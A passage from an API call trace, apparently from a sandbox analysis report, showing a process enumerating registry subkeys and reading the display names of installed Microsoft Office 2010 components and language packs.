CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Access MUI (English) 2010", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Access MUI (English) 2010", cchWideChar=42, lpMultiByteStr=0x2620d88, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Access MUI (English) 2010", lpUsedDefaultChar=0x0) returned 42 [0047.614] strlen (_Str="{90140000-0015-0409-1000-0000000FF1CE}") returned 0x26 [0047.614] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.614] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x15, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0016-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.614] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0016-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x54 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.614] wcslen (_String="Microsoft Office Excel MUI (English) 2010") returned 0x29 [0047.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Excel MUI (English) 2010", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0047.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Excel MUI (English) 2010", cchWideChar=41, lpMultiByteStr=0x2620dc0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Excel MUI (English) 2010", lpUsedDefaultChar=0x0) returned 41 [0047.615] strlen (_Str="{90140000-0016-0409-1000-0000000FF1CE}") returned 0x26 [0047.615] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.615] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x16, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0018-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.615] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0018-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x5e) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26268a8, lpcbData=0x59ffd3c*=0x5e | out: lpType=0x0, lpData=0x26268a8*=0x4d, lpcbData=0x59ffd3c*=0x5e) returned 0x0 [0047.615] wcslen (_String="Microsoft Office PowerPoint MUI (English) 2010") returned 0x2e [0047.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office PowerPoint MUI (English) 2010", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0047.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office PowerPoint MUI (English) 2010", cchWideChar=46, lpMultiByteStr=0x2620df8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office PowerPoint MUI (English) 2010", lpUsedDefaultChar=0x0) returned 46 [0047.615] strlen (_Str="{90140000-0018-0409-1000-0000000FF1CE}") returned 0x26 [0047.615] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.615] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x17, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0019-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.615] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0019-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x5c) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26268a8, lpcbData=0x59ffd3c*=0x5c | out: lpType=0x0, lpData=0x26268a8*=0x4d, lpcbData=0x59ffd3c*=0x5c) returned 0x0 [0047.615] wcslen (_String="Microsoft Office Publisher MUI (English) 2010") returned 0x2d [0047.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Publisher MUI (English) 2010", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0047.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Publisher MUI (English) 2010", cchWideChar=45, lpMultiByteStr=0x2620e30, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Publisher MUI (English) 2010", lpUsedDefaultChar=0x0) returned 45 [0047.615] strlen (_Str="{90140000-0019-0409-1000-0000000FF1CE}") returned 0x26 [0047.615] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.615] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x18, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001A-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.615] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001A-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.615] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26268a8, lpcbData=0x59ffd3c*=0x58 | out: lpType=0x0, lpData=0x26268a8*=0x4d, lpcbData=0x59ffd3c*=0x58) returned 0x0 [0047.616] wcslen (_String="Microsoft Office Outlook MUI (English) 2010") returned 0x2b [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Outlook MUI (English) 2010", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Outlook MUI (English) 2010", cchWideChar=43, lpMultiByteStr=0x2620e68, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Outlook MUI (English) 2010", lpUsedDefaultChar=0x0) returned 43 [0047.616] strlen (_Str="{90140000-001A-0409-1000-0000000FF1CE}") returned 0x26 [0047.616] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.616] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x19, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001B-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.616] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001B-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.616] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x52) returned 0x0 [0047.616] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x52 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x52) returned 0x0 [0047.616] wcslen (_String="Microsoft Office Word MUI (English) 2010") returned 0x28 [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Word MUI (English) 2010", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Word MUI (English) 2010", cchWideChar=40, lpMultiByteStr=0x2620ea0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Word MUI (English) 2010", lpUsedDefaultChar=0x0) returned 40 [0047.616] strlen (_Str="{90140000-001B-0409-1000-0000000FF1CE}") returned 0x26 [0047.616] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.616] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1a, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.616] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.616] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x4c) returned 0x0 [0047.616] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2621400, lpcbData=0x59ffd3c*=0x4c | out: lpType=0x0, lpData=0x2621400*=0x4d, lpcbData=0x59ffd3c*=0x4c) returned 0x0 [0047.616] wcslen (_String="Microsoft Office Proof (English) 2010") returned 0x25 [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (English) 2010", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0047.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (English) 2010", cchWideChar=37, lpMultiByteStr=0x2618638, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Proof (English) 2010", lpUsedDefaultChar=0x0) returned 37 [0047.617] strlen (_Str="{90140000-001F-0409-1000-0000000FF1CE}") returned 0x26 [0047.617] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.617] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1b, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{0242505C-4E90-407F-9299-B5B275F50D86}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.617] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{0242505C-4E90-407F-9299-B5B275F50D86}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.617] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.617] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.617] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620ed8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.617] strlen (_Str="{90140000-001F-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{0242505C-4E90-407F-9299-B5B275F50D86}") returned 0x5f [0047.617] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.617] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1c, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0409-1000-0000000FF1CE}_Office14.VISIOR_{0242505C-4E90-407F-9299-B5B275F50D86}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.617] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0409-1000-0000000FF1CE}_Office14.VISIOR_{0242505C-4E90-407F-9299-B5B275F50D86}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.617] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.617] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.617] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620f10, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.618] strlen (_Str="{90140000-001F-0409-1000-0000000FF1CE}_Office14.VISIOR_{0242505C-4E90-407F-9299-B5B275F50D86}") returned 0x5d [0047.618] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.618] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1d, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-040C-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.618] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-040C-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.618] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x4a) returned 0x0 [0047.618] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2621400, lpcbData=0x59ffd3c*=0x4a | out: lpType=0x0, lpData=0x2621400*=0x4d, lpcbData=0x59ffd3c*=0x4a) returned 0x0 [0047.618] wcslen (_String="Microsoft Office Proof (French) 2010") returned 0x24 [0047.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (French) 2010", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0047.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (French) 2010", cchWideChar=36, lpMultiByteStr=0x2618698, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Proof (French) 2010", lpUsedDefaultChar=0x0) returned 36 [0047.618] strlen (_Str="{90140000-001F-040C-1000-0000000FF1CE}") returned 0x26 [0047.618] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.618] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1e, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUSR_{B51389C8-2890-4633-81D8-47D2A7402274}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.618] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUSR_{B51389C8-2890-4633-81D8-47D2A7402274}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.618] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.618] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.618] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620f48, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.618] strlen (_Str="{90140000-001F-040C-1000-0000000FF1CE}_Office14.PROPLUSR_{B51389C8-2890-4633-81D8-47D2A7402274}") returned 0x5f [0047.618] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.619] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1f, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-040C-1000-0000000FF1CE}_Office14.VISIOR_{B51389C8-2890-4633-81D8-47D2A7402274}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.619] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-040C-1000-0000000FF1CE}_Office14.VISIOR_{B51389C8-2890-4633-81D8-47D2A7402274}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.619] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620f80, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.619] strlen (_Str="{90140000-001F-040C-1000-0000000FF1CE}_Office14.VISIOR_{B51389C8-2890-4633-81D8-47D2A7402274}") returned 0x5d [0047.619] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.619] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x20, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0C0A-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.619] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0C0A-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x4c) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2621400, lpcbData=0x59ffd3c*=0x4c | out: lpType=0x0, lpData=0x2621400*=0x4d, lpcbData=0x59ffd3c*=0x4c) returned 0x0 [0047.619] wcslen (_String="Microsoft Office Proof (Spanish) 2010") returned 0x25 [0047.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (Spanish) 2010", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0047.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proof (Spanish) 2010", cchWideChar=37, lpMultiByteStr=0x26186f8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Proof (Spanish) 2010", lpUsedDefaultChar=0x0) returned 37 [0047.619] strlen (_Str="{90140000-001F-0C0A-1000-0000000FF1CE}") returned 0x26 [0047.619] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.619] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x21, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.PROPLUSR_{1779650B-2E44-4A19-8DF6-3866D645764A}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.619] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.PROPLUSR_{1779650B-2E44-4A19-8DF6-3866D645764A}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.619] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.619] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620fb8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 